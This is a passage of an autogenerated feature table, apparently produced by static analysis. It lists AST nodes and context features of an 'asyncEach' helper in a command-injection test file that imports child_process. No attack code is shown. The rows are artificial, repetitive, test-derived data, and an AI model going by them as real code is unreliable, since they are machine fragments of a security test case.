autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:3:10:4 | (functi ... );\\n }) | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:3:10:6 | (functi ... \\n })() | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:3:10:6 | (functi ... \\n })() | contextSurroundingFunctionParameters | (arr, iterator) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:3:10:6 | (functi ... \\n })() | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:3:10:6 | (functi ... \\n })() | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:3:10:6 | (functi ... \\n })() | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:3:10:6 | exceptional return of (functi ... \\n })() | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:3:10:6 | exceptional return of (functi ... \\n })() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:3:10:6 | exceptional return of (functi ... \\n })() | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:3:10:6 | exceptional return of (functi ... \\n })() | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:3:10:6 | exceptional return of (functi ... \\n })() | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:5:3 | arr | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:5:3 | arr | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:5:3 | arr | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:5:3 | arr | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:5:3 | arr | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:5:3 | i | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:5:3 | i | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:5:3 | i | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:5:3 | i | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:5:3 | i | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:5:3 | iterator | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:5:3 | iterator | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:5:3 | iterator | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:5:3 | iterator | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:5:3 | iterator | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:5:3 | this | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:5:3 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:5:3 | this | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:5:3 | this | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:5:3 | this | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:5:4 | iterate | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:5:4 | iterate | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:5:4 | iterate | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:5:4 | iterate | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:5:4 | iterate | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:10:3 | 'arguments' object of function iterate | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:10:3 | 'arguments' object of function iterate | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:10:3 | 'arguments' object of function iterate | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:10:3 | 'arguments' object of function iterate | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:10:3 | 'arguments' object of function iterate | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:10:3 | exceptional return of function iterate | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:10:3 | exceptional return of function iterate | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:10:3 | exceptional return of function iterate | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:10:3 | exceptional return of function iterate | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:10:3 | exceptional return of function iterate | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:10:3 | functio ... });\\n } | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:10:3 | functio ... });\\n } | contextSurroundingFunctionParameters | (arr, iterator)\n() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:10:3 | functio ... });\\n } | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:10:3 | functio ... });\\n } | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:10:3 | functio ... });\\n } | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:10:3 | return of function iterate | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:10:3 | return of function iterate | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:10:3 | return of function iterate | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:10:3 | return of function iterate | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:4:10:3 | return of function iterate | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:13:5:19 | iterate | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:13:5:19 | iterate | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:13:5:19 | iterate | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:13:5:19 | iterate | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:13:5:19 | iterate | contextSurroundingFunctionParameters | (arr, iterator)\n() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:13:5:19 | iterate | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:13:5:19 | iterate | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:13:5:19 | iterate | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:13:5:19 | iterate | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:13:5:19 | iterate | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:13:5:19 | iterate | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:13:5:19 | iterate | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:5:13:5:19 | iterate | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:5:6:12 | iterator | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:5:6:12 | iterator | contextSurroundingFunctionParameters | (arr, iterator)\n() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:5:6:12 | iterator | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:5:6:12 | iterator | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:5:6:12 | iterator | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:5:9:6 | exceptional return of iterato ... \\n }) | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:5:9:6 | exceptional return of iterato ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:5:9:6 | exceptional return of iterato ... \\n }) | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:5:9:6 | exceptional return of iterato ... \\n }) | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:5:9:6 | exceptional return of iterato ... \\n }) | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:5:9:6 | iterato ... \\n }) | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:5:9:6 | iterato ... \\n }) | contextSurroundingFunctionParameters | (arr, iterator)\n() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:5:9:6 | iterato ... \\n }) | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:5:9:6 | iterato ... \\n }) | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:5:9:6 | iterato ... \\n }) | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:14:6:16 | arr | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:14:6:16 | arr | contextSurroundingFunctionParameters | (arr, iterator)\n() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:14:6:16 | arr | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:14:6:16 | arr | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:14:6:16 | arr | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:14:6:21 | arr[i++] | CalleeFlexibleAccessPath | iterator | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:14:6:21 | arr[i++] | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:14:6:21 | arr[i++] | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:14:6:21 | arr[i++] | contextSurroundingFunctionParameters | (arr, iterator)\n() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:14:6:21 | arr[i++] | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:14:6:21 | arr[i++] | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:14:6:21 | arr[i++] | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:18:6:18 | i | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:18:6:18 | i | contextSurroundingFunctionParameters | (arr, iterator)\n() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:18:6:18 | i | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:18:6:18 | i | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:18:6:18 | i | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:18:6:20 | i | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:18:6:20 | i | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:18:6:20 | i | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:18:6:20 | i | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:18:6:20 | i | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:18:6:20 | i++ | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:18:6:20 | i++ | contextSurroundingFunctionParameters | (arr, iterator)\n() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:18:6:20 | i++ | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:18:6:20 | i++ | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:18:6:20 | i++ | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:6:23 | arr | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:6:23 | arr | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:6:23 | arr | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:6:23 | arr | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:6:23 | arr | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:6:23 | i | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:6:23 | i | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:6:23 | i | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:6:23 | i | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:6:23 | i | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:6:23 | iterate | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:6:23 | iterate | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:6:23 | iterate | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:6:23 | iterate | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:6:23 | iterate | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:6:23 | this | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:6:23 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:6:23 | this | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:6:23 | this | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:6:23 | this | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:9:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:9:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:9:5 | 'arguments' object of anonymous function | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:9:5 | 'arguments' object of anonymous function | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:9:5 | 'arguments' object of anonymous function | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:9:5 | exceptional return of anonymous function | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:9:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:9:5 | exceptional return of anonymous function | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:9:5 | exceptional return of anonymous function | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:9:5 | exceptional return of anonymous function | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:9:5 | functio ... ;\\n } | CalleeFlexibleAccessPath | iterator | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:9:5 | functio ... ;\\n } | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:9:5 | functio ... ;\\n } | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:9:5 | functio ... ;\\n } | contextSurroundingFunctionParameters | (arr, iterator)\n()\n() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:9:5 | functio ... ;\\n } | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:9:5 | functio ... ;\\n } | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:9:5 | functio ... ;\\n } | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:9:5 | return of anonymous function | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:9:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:9:5 | return of anonymous function | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:9:5 | return of anonymous function | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:6:24:9:5 | return of anonymous function | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:7:11:7:11 | i | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:7:11:7:11 | i | contextSurroundingFunctionParameters | (arr, iterator)\n()\n() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:7:11:7:11 | i | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:7:11:7:11 | i | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:7:11:7:11 | i | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:7:11:7:24 | i < arr.length | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:7:11:7:24 | i < arr.length | contextSurroundingFunctionParameters | (arr, iterator)\n()\n() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:7:11:7:24 | i < arr.length | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:7:11:7:24 | i < arr.length | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:7:11:7:24 | i < arr.length | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:7:15:7:17 | arr | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:7:15:7:17 | arr | contextSurroundingFunctionParameters | (arr, iterator)\n()\n() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:7:15:7:17 | arr | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:7:15:7:17 | arr | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:7:15:7:17 | arr | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:7:15:7:24 | arr.length | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:7:15:7:24 | arr.length | contextSurroundingFunctionParameters | (arr, iterator)\n()\n() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:7:15:7:24 | arr.length | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:7:15:7:24 | arr.length | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:7:15:7:24 | arr.length | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:7:19:7:24 | length | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:7:19:7:24 | length | contextSurroundingFunctionParameters | (arr, iterator)\n()\n() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:7:19:7:24 | length | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:7:19:7:24 | length | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:7:19:7:24 | length | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:8:9:8:15 | process | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:8:9:8:15 | process | contextSurroundingFunctionParameters | (arr, iterator)\n()\n() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:8:9:8:15 | process | enclosingFunctionBody | arr iterator i 0 iterate iterator arr i i arr length process nextTick iterate | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:8:9:8:15 | process | enclosingFunctionName | asyncEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:8:9:8:15 | process | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/execSeries.js:8:9:8:24 | process.nextTick | contextFunctionInterfaces | asyncEach(arr, iterator)\nexecEach(commands)\niterate() | +| 